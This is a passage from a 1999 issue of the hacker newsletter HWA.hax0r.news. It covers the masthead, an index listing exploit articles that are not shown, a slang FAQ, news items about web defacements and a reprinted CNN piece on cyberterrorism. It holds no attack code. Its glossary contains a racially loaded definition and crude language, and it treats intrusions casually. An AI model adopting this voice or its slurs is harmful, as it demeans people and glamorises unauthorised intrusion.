[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 21 Volume 1 1999 June 5th 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and airportman for the Cubesoft bandwidth. Also shouts out to all our * mirror sites! tnx guys. http://www.csoft.net/~hwa http://www.digitalgeeks.com/hwa * Other mirror sites are listed in appendix A.1 Synopsis --------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #21 =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #21 In 1995, a New Jersey farmer yanked up a cable with his backhoe, knocking out 60 percent of the regional and long distance phone service in New York City and air traffic control functions in Boston, New York and Washington. In 1996, a rodent chewed through a cable in Palo Alto, California, and knocked Silicon Valley off the Internet for hours. In 1995, a New Jersey farmer yanked up a cable with his backhoe, knocking out 60 percent of the regional and long distance phone service in New York City and air traffic control functions in Boston, New York and Washington. In 1996, a rodent chewed through a cable in Palo Alto, California, and knocked Silicon Valley off the Internet for hours. - CNN =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. Bracing for guerrilla warfare in cyberspace (CNN)................ 04.0 .. The hacker from and administrators point of view (system)........ 05.0 .. Retaliation against the FBI continues............................ 06.0 .. Threat to online privacy: The Search Warrant..................... 07.0 .. 2600 in Aussieland bares its teeth at the current clampdown on The Net 08.0 .. Can the CIA break into banks?.................................... 09.0 .. Emmanuel Goldstein Interview .................................... 10.0 .. DOD Unplugs From Net as Another Gov Site Gets Hit ............... 11.0 .. UCITA About to be Approved ...................................... 12.0 .. Japan Follows Australia in Limiting Privacy ..................... 13.0 .. AGNPAC Revealed ................................................. 14.0 .. Bomb Making Info Available, For Nukes! .......................... 15.0 .. Exploit code for remote ipop2d security vulnerability that gives attacker a shell as user 'nobody' 16.0 .. Netscape Communicator 4.x "view-source:" JavaScript based security vulnerability 17.0 .. Vulnerability in Broker FTP Server v. 3.0 Build 1................ 18.0 .. whois_raw.cgi problem............................................ 19.0 .. Linux kernel 2.2.x vulnerability/exploit......................... 20.0 .. New Allaire Security Bulletin (ASB99-09)......................... 21.0 .. sdtcm_convert Overflow Exploits( for Intel Solaris 7)............ 22.0 .. ActiveState Security Advisory.................................... 23.0 .. Exploit in Internet Explorer 5.0................................. 24.0 .. IRIX 6.5 nsd virtual filesystem vulnerability.................... 25.0 .. a practical attack against ZKS Freedom........................... 26.0 .. DoS against PC Anywhere.......................................... 27.0 .. weaknesses in dns label decoding, denial of service attack (code included) (fwd) 28.0 .. Microsoft Worker Raided ......................................... 29.0 .. Is the FBI Missing the Point? ................................... 30.0 .. Norwegian Newspaper Cracked ..................................... 31.0 .. Student Busted for Changing Grades .............................. 32.0 .. FBI Lobbying Group Pushes for EavesDropping Capability .......... 33.0 .. Cons, Cons and more Cons ........................................ 34.0 .. Friday June 4th: FREE KEVIN Demonstrations Today! .............. 35.0 .. Germany Frees Crypto ............................................ 36.0 .. US Congress Demands Echelon Docs ................................ 37.0 .. Windows2000 Already Available ................................... 38.0 .. NetBus Takes #1 Spot ............................................ 39.0 .. [ISN] Police will have 24-hour access to secret files............ 40.0 .. [ISN] Hack attack knocks out FBI site............................ 41.0 .. [ISN] What's a Little Hacking Between Friends?................... 42.0 .. [ISN] New hacker attack uses screensavers........................ 43.0 .. [ISN] Hackers beware: IBM to sharpen Haxor....................... 44.0 .. [ISN] Feds Fend Off HACK3RZ...................................... 45.0 .. [ISN] High-tech snooping tools developed for spy agency.......... 46.0 .. [ISN] Privacy issues have taken center stage..................... 47.0 .. [ISN] Whitehouse to punish Hackers............................... 48.0 .. [ISN] Federal Cybercrime unit hunts for hackers.................. 49.0 .. [ISN] Hong Kong Computer Hacking Syndicate Smashed............... 50.0 .. [ISN] New Tools Prevent Network Attacks.......................... 51.0 .. [ISN] U.K. Crypto Policy May Have Hidden Agenda.................. 52.0 .. [ISN] Tackling E-Privacy in New York............................. 53.0 .. [ISN] Congress, NSA butt heads over Echelon...................... 54.0 .. [ISN] Visa, Wells Fargo Deliver E-Payment Alternatives........... 55.0 .. [ISN] Protocols serve up VPN security............................ =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: Aug19th-22nd Niagara Falls... ................. HA.HA .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls .......................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ News/Humour site+ ................Link http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 Link http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack Link http://www.ottawacitizen.com/business/ Link http://search.yahoo.com.sg/search/news_sg?p=hack Link http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack Link http://www.zdnet.com/zdtv/cybercrime/ Link http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) Link NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm Link http://freespeech.org/eua/ Electronic Underground Affiliation Link http://ech0.cjb.net ech0 Security Link http://axon.jccc.net/hir/ Hackers Information Report Link http://net-security.org Net Security Link http://www.403-security.org Daily news and security related site Link Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Kevin Mitnick (watch yer back) Dicentra vexxation sAs72 Spikeman Astral p0lix Vexx g0at security Shouts to tekz from HK for asking nicely in eye-are-see! ;-) and to t4ck for making my night albeit I couldn't stick around for the rest of the comedy routine. hacked star dot star with phf huh? .... ;-)) and the #innerpulse, crew and some inhabitants of #leetchans .... although I use the term 'leet loosely these days, ;) kewl sites: + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ INN Gone? From ProjectGamma http://www.projectgamma.com/news/34.html June 2, 1999, 00:09 Author: WHiTe VaMPiRe Innerpulse News Network (INN) has a message on their Web site stating that it was taken down by order of the U.S. government for transmitting military secrets to the Chinese. The validity of this message is unknown. It could just be another joke perpetuated by s1ko, the Webmaster of INN. Once Project Gamma discovers the validity of the message you will be the first to know. Related links: Innerpulse News Network http://www.innerpulse.com/ ++ Ultratech Hacked by Infiltrators Inc. From ProjectGamma, http://www.projectgamma.com/news/38.html June 3, 1999, 01:13 Author: nexus Ultratech-is.net was recently hacked by a new group on the net named Infiltrators Inc., a new security group formed by "nexus." Officials at Ultratech were alerted to the security breach and have secured the server with the help of Infiltrators Inc. Ultratech's site remained "altered" for approximately 5 hours, and was still undiscovered by admins. The group then removed the altered page and reposted the origional as the admins still did not notice. The site was hacked using a private exploit made by Shiva2000 of Infiltrators Inc. to gain root access. This is the first webpage altered by the group, who was founded May 24, 1999. Related Links: Ultratech website http://www.ultratech-is.net Reported by nexus ++ OpenSEC Mailing List From HNN http://www.hackernews.com/ contributed by cult_hero A new mailing list has popped up called OpenSEC (Open Security Solutions). This list is dedicated to announcing the latest versions of free and Open Source security tools. For more information, Open Security Solutions http://www.opensec.net ++ HIR #9 From HNN http://www.hackernews.com/ contributed by h_i_r HiR E-Zine Crew brings forth Hackers Information Report: Issue #9. Covered in HiR 9: An Operating system comparison (FreeBSD, RedHat 5.2, and NT4), **How to make your own Acoustic coupler**, and all sorts of other goodies and cool stuff. Check it out. HiR Distro Site http://axon.jccc.net/hir/ ++ The New Antidote is Available. From HNN http://www.hackernews.com/ contributed by Lord Oak With more info on Cold Fusion Fixes, Bomb making information on the net, and Social Engineering, Antidote has released its newest issue. Antidote Volume 2 Issue 6 http://www.thepoison.org/antidote/issues/vol2/6.txt Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ NO mail this week for posting here! ================================================================ @HWA 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* * *#21? yep, enjoy ... * * * * * * * * */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. @HWA 03.0 [CNN] Bracing for querrilla warfare in cyberspace ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Bracing for guerrilla warfare in cyberspace http://www.cnn.com/TECH/specials/hackers/cyberterror/ 'There are lots of opportunities; that's very scary' April 6, 1999 Web posted at: 2:29 p.m. EDT (1829 GMT) By John Christensen CNN Interactive (CNN) -- It is June, the children are out of school, and as highways and airports fill with vacationers, rolling power outages hit sections of Los Angeles, Chicago, Washington and New York. An airliner is mysteriously knocked off the flight control system and crashes in Kansas. Parts of the 911 service in Washington fail, supervisors at the Department of Defense discover that their e-mail and telephone services are disrupted and officers aboard a U.S. Navy cruiser find that their computer systems have been attacked. As incidents mount, the stock market drops precipitously, and panic surges through the population. Unlikely? Hardly. The "electronic Pearl Harbor" that White House terrorism czar Richard A. Clarke fears is not just a threat, it has already happened. Much of the scenario above -- except for the plane and stock market crashes and the panic -- occurred in 1997 when 35 hackers hired by the National Security Agency launched simulated attacks on the U.S. electronic infrastructure. "Eligible Receiver," as the exercise was called, achieved "root level" access in 36 of the Department of Defense's 40,000 networks. The simulated attack also "turned off" sections of the U.S. power grid, "shut down" parts of the 911 network in Washington, D.C., and other cities and gained access to systems aboard a Navy cruiser at sea. At a hearing in November 1997, Sen. Jon Kyl, R-Arizona, chairman of a Senate technology subcommittee, reported that nearly two-thirds of U.S. government computers systems have security holes. "If somebody wanted to launch an attack," says Fred B. Schneider, a professor of computer science at Cornell University, "it would not be at all difficult." 'There are lots of opportunities' Although "Eligible Receiver" took place in the United States, which has about 40 percent of the world's computers, the threat of cyberterrorism is global. Consider: During the Gulf War, Dutch hackers stole information about U.S. troop movements from U.S. Defense Department computers and tried to sell it to the Iraqis, who thought it was a hoax and turned it down. In March 1997, a 15-year-old Croatian youth penetrated computers at a U.S. Air Force base in Guam. In 1997 and 1998, an Israeli youth calling himself "The Analyzer" allegedly hacked into Pentagon computers with help from California teen-agers. Ehud Tenebaum, 20, was charged in Jerusalem in February 1999 with conspiracy and harming computer systems. In February 1999, unidentified hackers seized control of a British military communication satellite and demanded money in return for control of the satellite. The report was vehemently denied by the British military, which said all satellites were "where they should be and doing what they should be doing." Other knowledgable sources, including the Hacker News Network, called the hijacking highly unlikely. "There are lots of opportunities," says Schneider. "That's very scary." 'The Holy Grail of hackers' President Clinton announced in January 1999 a $1.46 billion initiative to deal with U.S. government computer security -- a 40 percent increase over fiscal 1998 spending. Of particular concern is the Pentagon, the military stronghold of the world's most powerful nation. "It's the Holy Grail of hackers," says computer security expert Rob Clyde. "It's about bragging rights for individuals and people with weird agendas." Clyde is vice president and general manager of technical security for Axent Technologies, a company headquartered in Rockville, Maryland, that counts the Pentagon as one of its customers. The Defense Department acknowledges between 60 and 80 attacks a day, although there have been reports of far more than that. The government says no top secret material has ever been accessed by these intruders, and that its most important information is not online. But the frustration is evident. Michael Vatis, director of the FBI's National Infrastructure Protection Committee, told a Senate subcommittee last year that tracing cyberattacks is like "tracking vapor." 'A lot of clueless people' Schneider says the "inherently vulnerable" nature of the electronic infrastructure makes counterterrorism measures even more difficult. Schneider chaired a two-year study by the National Academy of Sciences and the National Academy of Engineering that found that the infrastructure is badly conceived and poorly secured. "There is a saying that the amount of 'clue' [knowledge] on the Internet is constant, but the size of the Internet is growing exponentially," says Schneider. "In other words, there are a lot of clueless people out there. It's basically a situation where people don't know how to lock the door before walking out, so more and more machines are vulnerable." Schneider says the telephone system is far more complicated than it used to be, with "a lot of nodes that are programmable, and databases that can be hacked." Also, deregulation of the telephone and power industries has created another weakness: To stay competitive and cut costs, companies have reduced spare capacity, leaving them more vulnerable to outages and disruptions in service. Still another flaw is the domination of the telecommunications system by phone companies and Internet service providers (ISPs) that don't trust each other. As a result, the systems do not mesh seamlessly and are vulnerable to failures and disruptions. "There's no way to organize systems built on mutual suspicion," Schneider says. "We're subtly changing the underpinnings of the system, but we're not changing the way they're built. We'll keep creating cracks until we understand that we need a different set of principles for the components to deal with each other." 'The democratization of hacking' Meanwhile, the tools of mayhem are readily available. There are about 30,000 hacker-oriented sites on the Internet, bringing hacking -- and terrorism -- within the reach of even 